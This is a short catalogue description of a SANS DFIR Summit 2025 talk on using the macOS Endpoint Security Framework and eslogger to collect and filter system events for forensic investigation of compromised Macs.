MacOS Endpoint Security Framework - Not Another MacOS Log Source

Explore the MacOS Endpoint Security Framework in this 30-minute conference talk presented at SANS DFIR Summit 2025 by Jacob Latonis from Proofpoint and Julia Paluch from GreyNoise Intelligence. Learn how to leverage this powerful feature, introduced in MacOS Catalina and continuously enhanced with each major OS update, as a complementary source of information alongside traditional tools like the Apple Unified Log for digital forensics and incident response investigations. Discover how the Endpoint Security Framework, primarily utilized by EDR solutions for detection purposes, can be effectively employed by DFIR professionals to baseline systems and monitor for anomalous activity on actively compromised machines. Master the use of eslogger to stream real-time events firing on the system, and examine practical examples of malware execution with corresponding Endpoint Security records to understand how these records serve as valuable evidence. Gain insights into filtering techniques to cut through noise and focus on relevant events, enabling more efficient threat hunting and investigation processes. Understand the specific information that MacOS tracks through this framework and learn how to synthesize this data to concentrate on what matters most during active system compromises. Walk away with enhanced knowledge of MacOS's evolving security capabilities and practical skills for incorporating the Endpoint Security Framework into your DFIR toolkit for investigations involving live, potentially compromised systems.